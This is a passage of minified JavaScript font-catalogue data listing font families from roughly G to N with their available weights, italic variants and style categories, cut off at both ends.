A1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Gotu",v:[400],f:"sans-serif"},{n:"Goudy Bookletter 1911",v:[400],f:"serif"},{n:"Gowun Batang",v:[400,700],f:"serif"},{n:"Gowun Dodum",v:[400],f:"sans-serif"},{n:"Graduate",v:[400],f:"display"},{n:"Grand Hotel",v:[400],f:"handwriting"},{n:"Grandstander",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Grape Nuts",v:[400],f:"handwriting"},{n:"Gravitas One",v:[400],f:"display"},{n:"Great Vibes",v:[400],f:"handwriting"},{n:"Grechen Fuemen",v:[400],f:"handwriting"},{n:"Grenze",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Grenze Gotisch",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Grey Qo",v:[400],f:"handwriting"},{n:"Griffy",v:[400],f:"display"},{n:"Gruppo",v:[400],f:"sans-serif"},{n:"Gudea",v:[400,"400i",700],f:"sans-serif"},{n:"Gugi",v:[400],f:"display"},{n:"Gupter",v:[400,500,700],f:"serif"},{n:"Gurajada",v:[400],f:"serif"},{n:"Gwendolyn",v:[400,700],f:"handwriting"},{n:"Gajraj One",v:[400],f:"display"},{n:"Gantari",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Gloock",v:[400],f:"serif"},{n:"Golos Text",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Gulzar",v:[400],f:"serif"},{n:"Gentium Book Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Gentium Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Habibi",v:[400],f:"serif"},{n:"Hachi Maru Pop",v:[400],f:"handwriting"},{n:"Hahmlet",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Halant",v:["300",400,500,600,700],f:"serif"},{n:"Hammersmith One",v:[400],f:"sans-serif"},{n:"Hanalei",v:[400],f:"display"},{n:"Hanalei Fill",v:[400],f:"display"},{n:"Handlee",v:[400],f:"handwriting"},{n:"Hanuman",v:["100","300",400,700,900],f:"serif"},{n:"Happy Monkey",v:[400],f:"display"},{n:"Harmattan",v:[400,500,600,700],f:"sans-serif"},{n:"Headland One",v:[400],f:"serif"},{n:"Heebo",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Henny Penny",v:[400],f:"display"},{n:"Hepta Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Herr Von Muellerhoff",v:[400],f:"handwriting"},{n:"Hi Melody",v:[400],f:"handwriting"},{n:"Hina Mincho",v:[400],f:"serif"},{n:"Hind",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Guntur",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Madurai",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Siliguri",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Vadodara",v:["300",400,500,600,700],f:"sans-serif"},{n:"Holtwood One SC",v:[400],f:"serif"},{n:"Homemade Apple",v:[400],f:"handwriting"},{n:"Homenaje",v:[400],f:"sans-serif"},{n:"Hubballi",v:[400],f:"display"},{n:"Hurricane",v:[400],f:"handwriting"},{n:"Hanken Grotesk",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"IBM Plex Mono",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"monospace"},{n:"IBM Plex Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Arabic",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Devanagari",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Hebrew",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans KR",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai Looped",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Serif",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"IM Fell DW Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell DW Pica SC",v:[400],f:"serif"},{n:"IM Fell Double Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell Double Pica SC",v:[400],f:"serif"},{n:"IM Fell English",v:[400,"400i"],f:"serif"},{n:"IM Fell English SC",v:[400],f:"serif"},{n:"IM Fell French Canon",v:[400,"400i"],f:"serif"},{n:"IM Fell French Canon SC",v:[400],f:"serif"},{n:"IM Fell Great Primer",v:[400,"400i"],f:"serif"},{n:"IM Fell Great Primer SC",v:[400],f:"serif"},{n:"Ibarra Real Nova",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Iceberg",v:[400],f:"display"},{n:"Iceland",v:[400],f:"display"},{n:"Imbue",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Imperial Script",v:[400],f:"handwriting"},{n:"Imprima",v:[400],f:"sans-serif"},{n:"Inconsolata",v:["200","300",400,500,600,700,800,900],f:"monospace"},{n:"Inder",v:[400],f:"sans-serif"},{n:"Indie Flower",v:[400],f:"handwriting"},{n:"Ingrid Darling",v:[400],f:"handwriting"},{n:"Inika",v:[400,700],f:"serif"},{n:"Inknut Antiqua",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Inria Sans",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Inria Serif",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Inspiration",v:[400],f:"handwriting"},{n:"Inter",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Irish Grover",v:[400],f:"display"},{n:"Island Moments",v:[400],f:"handwriting"},{n:"Istok Web",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Italiana",v:[400],f:"serif"},{n:"Italianno",v:[400],f:"handwriting"},{n:"Itim",v:[400],f:"handwriting"},{n:"IBM Plex Sans JP",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Instrument Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Instrument Serif",v:[400,"400i"],f:"serif"},{n:"Inter Tight",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Jacques Francois",v:[400],f:"serif"},{n:"Jacques Francois Shadow",v:[400],f:"display"},{n:"Jaldi",v:[400,700],f:"sans-serif"},{n:"JetBrains Mono",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"monospace"},{n:"Jim Nightshade",v:[400],f:"handwriting"},{n:"Jockey One",v:[400],f:"sans-serif"},{n:"Jolly Lodger",v:[400],f:"display"},{n:"Jomhuria",v:[400],f:"display"},{n:"Jomolhari",v:[400],f:"serif"},{n:"Josefin Sans",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Josefin Slab",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"serif"},{n:"Jost",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Joti One",v:[400],f:"display"},{n:"Jua",v:[400],f:"sans-serif"},{n:"Judson",v:[400,"400i",700],f:"serif"},{n:"Julee",v:[400],f:"handwriting"},{n:"Julius Sans One",v:[400],f:"sans-serif"},{n:"Junge",v:[400],f:"serif"},{n:"Jura",v:["300",400,500,600,700],f:"sans-serif"},{n:"Just Another Hand",v:[400],f:"handwriting"},{n:"Just Me Again Down Here",v:[400],f:"handwriting"},{n:"K2D",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Joan",v:[400],f:"serif"},{n:"Kadwa",v:[400,700],f:"serif"},{n:"Kaisei Decol",v:[400,500,700],f:"serif"},{n:"Kaisei HarunoUmi",v:[400,500,700],f:"serif"},{n:"Kaisei Opti",v:[400,500,700],f:"serif"},{n:"Kaisei Tokumin",v:[400,500,700,800],f:"serif"},{n:"Kalam",v:["300",400,700],f:"handwriting"},{n:"Kameron",v:[400,700],f:"serif"},{n:"Kanit",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Karantina",v:["300",400,700],f:"display"},{n:"Karla",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Karma",v:["300",400,500,600,700],f:"serif"},{n:"Katibeh",v:[400],f:"display"},{n:"Kaushan Script",v:[400],f:"handwriting"},{n:"Kavivanar",v:[400],f:"handwriting"},{n:"Kavoon",v:[400],f:"display"},{n:"Keania One",v:[400],f:"display"},{n:"Kelly Slab",v:[400],f:"display"},{n:"Kenia",v:[400],f:"display"},{n:"Khand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Khmer",v:[400],f:"display"},{n:"Khula",v:["300",400,600,700,800],f:"sans-serif"},{n:"Kings",v:[400],f:"handwriting"},{n:"Kirang Haerang",v:[400],f:"display"},{n:"Kite One",v:[400],f:"sans-serif"},{n:"Kiwi Maru",v:["300",400,500],f:"serif"},{n:"Klee One",v:[400,600],f:"handwriting"},{n:"Knewave",v:[400],f:"display"},{n:"KoHo",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kodchasan",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Koh Santepheap",v:["100","300",400,700,900],f:"display"},{n:"Kolker Brush",v:[400],f:"handwriting"},{n:"Kosugi",v:[400],f:"sans-serif"},{n:"Kosugi Maru",v:[400],f:"sans-serif"},{n:"Kotta One",v:[400],f:"serif"},{n:"Koulen",v:[400],f:"display"},{n:"Kranky",v:[400],f:"display"},{n:"Kreon",v:["300",400,500,600,700],f:"serif"},{n:"Kristi",v:[400],f:"handwriting"},{n:"Krona One",v:[400],f:"sans-serif"},{n:"Krub",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kufam",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Kulim Park",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kumar One",v:[400],f:"display"},{n:"Kumar One Outline",v:[400],f:"display"},{n:"Kumbh Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Kurale",v:[400],f:"serif"},{n:"Kantumruy Pro",v:[100,200,300,400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Kdam Thmor Pro",v:[400],f:"sans-serif"},{n:"Konkhmer Sleokchher",v:[400],f:"display"},{n:"La Belle Aurore",v:[400],f:"handwriting"},{n:"Lacquer",v:[400],f:"display"},{n:"Laila",v:["300",400,500,600,700],f:"sans-serif"},{n:"Lakki Reddy",v:[400],f:"handwriting"},{n:"Lalezar",v:[400],f:"display"},{n:"Lancelot",v:[400],f:"display"},{n:"Langar",v:[400],f:"display"},{n:"Lateef",v:[200,300,400,500,600,700,800],f:"handwriting"},{n:"Lato",v:["100","100i","300","300i",400,"400i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lavishly Yours",v:[400],f:"handwriting"},{n:"League Gothic",v:[400],f:"sans-serif"},{n:"League Script",v:[400],f:"handwriting"},{n:"League Spartan",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Leckerli One",v:[400],f:"handwriting"},{n:"Ledger",v:[400],f:"serif"},{n:"Lekton",v:[400,"400i",700],f:"sans-serif"},{n:"Lemon",v:[400],f:"display"},{n:"Lemonada",v:["300",400,500,600,700],f:"display"},{n:"Lexend",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Deca",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Exa",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Giga",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Mega",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Peta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Tera",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Zetta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Libre Barcode 128",v:[400],f:"display"},{n:"Libre Barcode 128 Text",v:[400],f:"display"},{n:"Libre Barcode 39",v:[400],f:"display"},{n:"Libre Barcode 39 Extended",v:[400],f:"display"},{n:"Libre Barcode 39 Extended Text",v:[400],f:"display"},{n:"Libre Barcode 39 Text",v:[400],f:"display"},{n:"Libre Barcode EAN13 Text",v:[400],f:"display"},{n:"Libre Baskerville",v:[400,"400i",700],f:"serif"},{n:"Libre Bodoni",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Libre Caslon Display",v:[400],f:"serif"},{n:"Libre Caslon Text",v:[400,"400i",700],f:"serif"},{n:"Libre Franklin",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Licorice",v:[400],f:"handwriting"},{n:"Life Savers",v:[400,700,800],f:"display"},{n:"Lilita One",v:[400],f:"display"},{n:"Lily Script One",v:[400],f:"display"},{n:"Limelight",v:[400],f:"display"},{n:"Linden Hill",v:[400,"400i"],f:"serif"},{n:"Literata",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Liu Jian Mao Cao",v:[400],f:"handwriting"},{n:"Livvic",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lobster",v:[400],f:"display"},{n:"Lobster Two",v:[400,"400i",700,"700i"],f:"display"},{n:"Londrina Outline",v:[400],f:"display"},{n:"Londrina Shadow",v:[400],f:"display"},{n:"Londrina Sketch",v:[400],f:"display"},{n:"Londrina Solid",v:["100","300",400,900],f:"display"},{n:"Long Cang",v:[400],f:"handwriting"},{n:"Lora",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Love Light",v:[400],f:"handwriting"},{n:"Love Ya Like A Sister",v:[400],f:"display"},{n:"Loved by the King",v:[400],f:"handwriting"},{n:"Lovers Quarrel",v:[400],f:"handwriting"},{n:"Luckiest Guy",v:[400],f:"display"},{n:"Lusitana",v:[400,700],f:"serif"},{n:"Lustria",v:[400],f:"serif"},{n:"Luxurious Roman",v:[400],f:"display"},{n:"Luxurious Script",v:[400],f:"handwriting"},{n:"Labrada",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"M PLUS 1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS 1 Code",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS 1p",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"M PLUS 2",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS Code Latin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS Rounded 1c",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"Ma Shan Zheng",v:[400],f:"handwriting"},{n:"Macondo",v:[400],f:"display"},{n:"Macondo Swash Caps",v:[400],f:"display"},{n:"Mada",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Magra",v:[400,700],f:"sans-serif"},{n:"Maiden Orange",v:[400],f:"display"},{n:"Maitree",v:["200","300",400,500,600,700],f:"serif"},{n:"Major Mono Display",v:[400],f:"monospace"},{n:"Mako",v:[400],f:"sans-serif"},{n:"Mali",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"handwriting"},{n:"Mallanna",v:[400],f:"sans-serif"},{n:"Mandali",v:[400],f:"sans-serif"},{n:"Manjari",v:["100",400,700],f:"sans-serif"},{n:"Manrope",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mansalva",v:[400],f:"handwriting"},{n:"Manuale",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Marcellus",v:[400],f:"serif"},{n:"Marcellus SC",v:[400],f:"serif"},{n:"Marck Script",v:[400],f:"handwriting"},{n:"Margarine",v:[400],f:"display"},{n:"Markazi Text",v:[400,500,600,700],f:"serif"},{n:"Marko One",v:[400],f:"serif"},{n:"Marmelad",v:[400],f:"sans-serif"},{n:"Martel",v:["200","300",400,600,700,800,900],f:"serif"},{n:"Martel Sans",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Marvel",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Mate",v:[400,"400i"],f:"serif"},{n:"Mate SC",v:[400],f:"serif"},{n:"Maven Pro",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"McLaren",v:[400],f:"display"},{n:"Mea Culpa",v:[400],f:"handwriting"},{n:"Meddon",v:[400],f:"handwriting"},{n:"MedievalSharp",v:[400],f:"display"},{n:"Medula One",v:[400],f:"display"},{n:"Meera Inimai",v:[400],f:"sans-serif"},{n:"Megrim",v:[400],f:"display"},{n:"Meie Script",v:[400],f:"handwriting"},{n:"Meow Script",v:[400],f:"handwriting"},{n:"Merienda",v:[300,400,500,600,700,800,900],f:"handwriting"},{n:"Merriweather",v:["300","300i",400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Merriweather Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Metal",v:[400],f:"display"},{n:"Metal Mania",v:[400],f:"display"},{n:"Metamorphous",v:[400],f:"display"},{n:"Metrophobic",v:[400],f:"sans-serif"},{n:"Michroma",v:[400],f:"sans-serif"},{n:"Milonga",v:[400],f:"display"},{n:"Miltonian",v:[400],f:"display"},{n:"Miltonian Tattoo",v:[400],f:"display"},{n:"Mina",v:[400,700],f:"sans-serif"},{n:"Miniver",v:[400],f:"display"},{n:"Miriam Libre",v:[400,700],f:"sans-serif"},{n:"Mirza",v:[400,500,600,700],f:"display"},{n:"Miss Fajardose",v:[400],f:"handwriting"},{n:"Mitr",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Mochiy Pop One",v:[400],f:"sans-serif"},{n:"Mochiy Pop P One",v:[400],f:"sans-serif"},{n:"Modak",v:[400],f:"display"},{n:"Modern Antiqua",v:[400],f:"display"},{n:"Mogra",v:[400],f:"display"},{n:"Mohave",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Molengo",v:[400],f:"sans-serif"},{n:"Molle",v:["400i"],f:"handwriting"},{n:"Monda",v:[400,700],f:"sans-serif"},{n:"Monofett",v:[400],f:"monospace"},{n:"Monoton",v:[400],f:"display"},{n:"Monsieur La Doulaise",v:[400],f:"handwriting"},{n:"Montaga",v:[400],f:"serif"},{n:"Montagu Slab",v:["100","200","300",400,500,600,700],f:"serif"},{n:"MonteCarlo",v:[400],f:"handwriting"},{n:"Montez",v:[400],f:"handwriting"},{n:"Montserrat",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Montserrat Alternates",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Montserrat Subrayada",v:[400,700],f:"sans-serif"},{n:"Moo Lah Lah",v:[400],f:"display"},{n:"Moon Dance",v:[400],f:"handwriting"},{n:"Moul",v:[400],f:"display"},{n:"Moulpali",v:[400],f:"display"},{n:"Mountains of Christmas",v:[400,700],f:"display"},{n:"Mouse Memoirs",v:[400],f:"sans-serif"},{n:"Mr Bedfort",v:[400],f:"handwriting"},{n:"Mr Dafoe",v:[400],f:"handwriting"},{n:"Mr De Haviland",v:[400],f:"handwriting"},{n:"Mrs Saint Delafield",v:[400],f:"handwriting"},{n:"Mrs Sheppards",v:[400],f:"handwriting"},{n:"Ms Madi",v:[400],f:"handwriting"},{n:"Mukta",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Mahee",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Malar",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Vaani",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mulish",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Murecho",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"MuseoModerno",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"My Soul",v:[400],f:"handwriting"},{n:"Mystery Quest",v:[400],f:"display"},{n:"Marhey",v:[300,400,500,600,700],f:"display"},{n:"Martian Mono",v:[100,200,300,400,500,600,700,800],f:"monospace"},{n:"Material Icons",v:[400],f:"monospace"},{n:"Material Icons Outlined",v:[400],f:"monospace"},{n:"Material Icons Round",v:[400],f:"monospace"},{n:"Material Icons Sharp",v:[400],f:"monospace"},{n:"Material Icons Two Tone",v:[400],f:"monospace"},{n:"Material Symbols Outlined",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Rounded",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Sharp",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Mingzat",v:[400],f:"sans-serif"},{n:"Monomaniac One",v:[400],f:"sans-serif"},{n:"Mynerve",v:[400],f:"handwriting"},{n:"NTR",v:[400],f:"sans-serif"},{n:"Nanum Brush Script",v:[400],f:"handwriting"},{n:"Nanum Gothic",v:[400,700,800],f:"sans-serif"},{n:"Nanum Gothic Coding",v:[400,700],f:"monospace"},{n:"Nanum Myeongjo",v:[400,700,800],f:"serif"},{n:"Nanum Pen Script",v:[400],f:"handwriting"},{n:"Neonderthaw",v:[400],f:"handwriting"},{n:"Nerko One",v:[400],f:"handwriting"},{n:"Neucha",v:[400],f:"handwriting"},{n:"Neuton",v:["200","300",400,"400i",700,800],f:"serif"},{n:"New Rocker",v:[400],f:"display"},{n:"New Tegomin",v:[400],f:"serif"},{n:"News Cycle",v:[400,700],f:"sans-serif"},{n:"Newsreader",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Niconne",v:[400],f:"handwriting"},{n:"Niramit",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Nixie One",v:[400],f:"display"},{n:"Nobile",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Nokora",v:["100","300",400,700,900],f:"sans-serif"},{n:"Norican",v:[400],f:"handwriting"},{n:"Nosifer",v:[400],f:"display"},{n:"Notable",v:[400],f:"sans-serif"},{n:"Nothing You Could Do",v:[400],f:"handwriting"},{n:"Noticia Text",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Emoji",v:["300",400,500,600,700],f:"sans-serif"},{n:"Noto Kufi Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Music",v:[400],f:"sans-serif"},{n:"Noto Naskh Arabic",v:[400,500,600,700],f:"serif"},{n:"Noto Nastaliq Urdu",v:[400,500,600,700],f:"serif"},{n:"Noto Rashi Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Noto Sans Adlam",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Adlam Unjoined",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Anatolian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Armenian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Avestan",v:[400],f:"sans-serif"},{n:"Noto Sans Balinese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bamum",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bassa Vah",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Batak",v:[400],f:"sans-serif"},{n:"Noto Sans Bengali",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Bhaiksuki",v:[400],f:"sans-serif"},{n:"Noto Sans Brahmi",v:[400],f:"sans-serif"},{n:"Noto Sans Buginese",v:[400],f:"sans-serif"},{n:"Noto Sans Buhid",v:[400],f:"sans-serif"},{n:"Noto Sans Canadian Aboriginal",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Carian",v:[400],f:"sans-serif"},{n:"Noto Sans Caucasian Albanian",v:[400],f:"sans-serif"},{n:"Noto Sans Chakma",v:[400],f:"sans-serif"},{n:"Noto Sans Cham",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Cherokee",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Coptic",v:[400],f:"sans-serif"},{n:"Noto Sans Cuneiform",v:[400],f:"sans-serif"},{n:"Noto Sans Cypriot",v:[400],f:"sans-serif"},{n:"Noto Sans Deseret",v:[400],f:"sans-serif"},{n:"Noto Sans Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Noto Sans Duployan",v:[400],f:"sans-serif"},{n:"Noto Sans Egyptian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Elbasan",v:[400],f:"sans-serif"},{n:"Noto Sans Elymaic",v:[400],f:"sans-serif"},{n:"Noto Sans Georgian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Glagolitic",v:[400],f:"sans-serif"},{n:"Noto Sans Gothic",v:[400],f:"sans-serif"},{n:"Noto Sans Grantha",v:[400],f:"sans-serif"},{n:"Noto Sans Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Gunjala Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans HK",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Hanifi Rohingya",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Hanunoo",v:[400],f:"sans-serif"},{n:"Noto Sans Hatran",v:[400],f:"sans-serif"},{n:"Noto Sans Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Imperial Aramaic",v:[400],f:"sans-serif"},{n:"Noto Sans Indic Siyaq Numbers",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Parthian",v:[400],f:"sans-serif"},{n:"Noto Sans JP",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Javanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans KR",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Kaithi",v:[400],f:"sans-serif"},{n:"Noto Sans Kannada",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Kayah Li",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Kharoshthi",v:[400],f:"sans-serif"},{n:"Noto Sans Khmer",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Khojki",v:[400],f:"sans-serif"},{n:"Noto Sans Khudawadi",v:[400],f:"sans-serif"},{n:"Noto Sans Lao",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lepcha",v:[400],f:"sans-serif"},{n:"Noto Sans Limbu",v:[400],f:"sans-serif"},{n:"Noto Sans Linear A",v:[400],f:"sans-serif"},{n:"Noto Sans Linear B",v:[400],f:"sans-serif"},{n:"Noto Sans Lisu",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Lycian",v:[400],f:"sans-serif"},{n:"Noto Sans Lydian",v:[400],f:"sans-serif"},{n:"Noto Sans Mahajani",v:[400],f:"sans-serif"},{n:"Noto Sans Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mandaic",v:[400],f:"sans-serif"},{n:"Noto Sans Manichaean",v:[400],f:"sans-serif"},{n:"Noto Sans Marchen",v:[400],f:"sans-serif"},{n:"Noto Sans Masaram Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Math",v:[400],f:"sans-serif"},{n:"Noto Sans Mayan Numerals",v:[400],f:"sans-serif"},{n:"Noto Sans Medefaidrin",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Meetei Mayek",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans 